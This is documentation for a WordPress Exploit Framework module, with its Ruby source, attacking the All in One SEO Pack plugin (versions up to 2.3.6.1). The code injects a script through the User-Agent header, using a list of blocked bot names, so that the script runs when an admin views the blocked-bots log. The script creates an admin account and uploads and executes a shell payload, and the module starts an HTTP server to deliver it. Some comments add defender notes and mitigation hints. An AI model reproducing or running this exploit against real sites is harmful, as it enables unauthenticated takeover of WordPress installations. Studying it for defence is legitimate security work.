Class: Wpxf::Exploit::AllInOneSeoPackXssShellUpload
- Includes:
- WordPress::Xss
- Defined in:
- lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary
- #blocked_bots ⇒ Object
- #check ⇒ Object
- #initialize ⇒ AllInOneSeoPackXssShellUpload (constructor): A new instance of AllInOneSeoPackXssShellUpload.
- #run ⇒ Object
- #store_script ⇒ Object
Methods included from WordPress::Xss
#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script
Methods included from WordPress::Plugin
#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute
Methods included from Net::HttpServer
#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ AllInOneSeoPackXssShellUpload
Returns a new instance of AllInOneSeoPackXssShellUpload.
# File 'lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb', line 6

# Builds the module instance and registers its descriptive metadata.
#
# This method itself only calls the parent constructor and then hands the
# name, description, authors, references and date to update_info.
#
# Defender note: per the metadata below, the affected range is
# All in One SEO Pack <= 2.3.6.1, the injection point is an unsanitized HTTP
# header, and the stored script runs when an admin views the plugin's
# blocked bot logs.
def initialize
  super

  # Kept on one line so the literal's whitespace is unchanged.
  summary = %( This module exploits a lack of HTTP header sanitization in versions <= 2.3.6.1 of the All in One SEO Pack plugin which allows unauthenticated users to store a script that will create a new admin user and use the new credentials to upload and execute a payload when an admin views the blocked bot logs. ).strip

  credits = [
    'David Vaartjes', # Disclosure
    'rastating' # WPXF module
  ]

  advisories = [
    ['WPVDB', '8538'],
    ['URL', 'https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html']
  ]

  update_info(
    name: 'All in One SEO Pack <= 2.3.6.1 Stored XSS Shell Upload',
    desc: summary,
    author: credits,
    references: advisories,
    date: 'Jul 10 2016'
  )
end
Instance Method Details
#blocked_bots ⇒ Object
# File 'lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb', line 34

# Returns a fresh array of user-agent name fragments.
#
# store_script picks one entry at random and uses it as the leading part of
# the User-Agent header it sends.
#
# NOTE(review): these are presumably the agent names the plugin's bot blocker
# matches, so that the request is recorded in the blocked bots log; confirm
# against the plugin's own list.
#
# The order and the duplicate 'SemrushBot' entry are kept as in the original,
# because they affect the distribution of Array#sample.
#
# @return [Array<String>]
def blocked_bots
  agent_fragments = [
    'Abonti', 'aggregator', 'AhrefsBot', 'asterias', 'BDCbot', 'BLEXBot',
    'BuiltBotTough', 'Bullseye', 'BunnySlippers', 'ca-crawler', 'CCBot',
    'Cegbfeieh', 'CheeseBot', 'CherryPicker', 'CopyRightCheck', 'cosmos',
    'Crescent', 'discobot', 'DittoSpyder', 'DotBot', 'Download Ninja',
    'EasouSpider', 'EmailCollector', 'EmailSiphon', 'EmailWolf', 'EroCrawler',
    'Exabot', 'ExtractorPro', 'Fasterfox', 'FeedBooster', 'Foobot', 'Genieo',
    'grub-client', 'Harvest', 'hloader', 'httplib', 'HTTrack', 'humanlinks',
    'ieautodiscovery', 'InfoNaviRobot', 'IstellaBot', 'Java/1.', 'JennyBot',
    'k2spider', 'Kenjin Spider', 'Keyword Density/0.9', 'larbin', 'LexiBot',
    'libWeb', 'libwww', 'LinkextractorPro', 'linko', 'LinkScan/8.1a Unix',
    'LinkWalker', 'LNSpiderguy', 'lwp-trivial', 'magpie', 'Mata Hari',
    'MaxPointCrawler', 'MegaIndex', 'Microsoft URL Control', 'MIIxpc',
    'Mippin', 'Missigua Locator', 'Mister PiX', 'MJ12bot', 'moget',
    'MSIECrawler', 'NetAnts', 'NICErsPRO', 'Niki-Bot', 'NPBot', 'Nutch',
    'Offline Explorer', 'Openfind', 'panscient.com', 'PHP/5.{',
    'ProPowerBot/2.14', 'ProWebWalker', 'Python-urllib', 'QueryN Metasearch',
    'RepoMonkey', 'RMA', 'SemrushBot', 'SeznamBot', 'SISTRIX',
    'sitecheck.Internetseer.com', 'SiteSnagger', 'SnapPreviewBot', 'Sogou',
    'SpankBot', 'spanner', 'spbot', 'Spinn3r', 'suzuran', 'Szukacz/1.4',
    'Teleport', 'Telesoft', 'The Intraformant', 'TheNomad', 'TightTwatBot',
    'Titan', 'toCrawl/UrlDispatcher', 'True_Robot', 'turingos', 'TurnitinBot',
    'UbiCrawler', 'UnisterBot', 'URLy Warning', 'VCI', 'WBSearchBot',
    'Web Downloader/6.9', 'Web Image Collector', 'WebAuto', 'WebBandit',
    'WebCopier', 'WebEnhancer', 'WebmasterWorldForumBot', 'WebReaper',
    'WebSauger', 'Website Quester', 'Webster Pro', 'WebStripper', 'WebZip',
    'Wotbox', 'wsr-agent', 'WWW-Collector-E', 'Xenu', 'Zao', 'Zeus', 'ZyBORG',
    'coccoc', 'Incutio', 'lmspider', 'memoryBot', 'SemrushBot', 'serf',
    'Unknown', 'uptime files'
  ]

  agent_fragments
end
#check ⇒ Object
# File 'lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb', line 30

# Delegates the version check to check_plugin_version_from_readme and returns
# that helper's result unchanged.
#
# NOTE(review): '2.3.6.2' is presumably the first fixed release, since the
# module name states that versions <= 2.3.6.1 are affected; confirm against
# the helper's parameter semantics. For site owners this implies running
# 2.3.6.2 or later.
def check
  plugin_slug = 'all-in-one-seo-pack'
  version_bound = '2.3.6.2'

  check_plugin_version_from_readme(plugin_slug, version_bound)
end
#run ⇒ Object
# File 'lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb', line 199

# Module entry point.
#
# Returns false when either the parent's run or store_script returns a falsy
# value; store_script is not called if the parent's run fails. Otherwise it
# emits a success message, calls start_http_server and returns the value of
# xss_shell_success.
#
# NOTE(review): start_http_server and xss_shell_success come from included
# modules not visible here; what the server serves and how success is
# determined should be confirmed there.
def run
  # && short-circuits, so the order of the two checks matches the original.
  return false unless super && store_script

  emit_success 'Script stored and will be executed when a user views the blocked bots log'
  start_http_server
  xss_shell_success
end
#store_script ⇒ Object
# File 'lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb', line 178

# Sends one GET request to full_uri with a crafted User-Agent header.
#
# The header value is a random blocked_bots entry followed by a script element
# wrapping xss_ascii_encoded_include_script.
#
# Detection and mitigation: the request is recognisable by markup in the
# User-Agent header, so a log or WAF rule matching "<script" in that header
# covers it. Per the module description, the root cause is the plugin not
# sanitizing the header before storing and displaying it.
#
# @return [Boolean] false when no response was received, true otherwise
#   (a status other than 503 only produces a warning)
def store_script
  emit_info 'Storing script...'

  # full_uri is read before the header is built, as in the original.
  target = full_uri
  user_agent = "#{blocked_bots.sample}<script>#{xss_ascii_encoded_include_script}</script>"
  res = execute_get_request(url: target, headers: { 'User-Agent' => user_agent })

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  # NOTE(review): 503 is presumably what the plugin's bot blocker answers to a
  # blocked agent; any other status is reported but not treated as failure.
  emit_warning "Server responded with code #{res.code}, expected 503" if res.code != 503

  true
end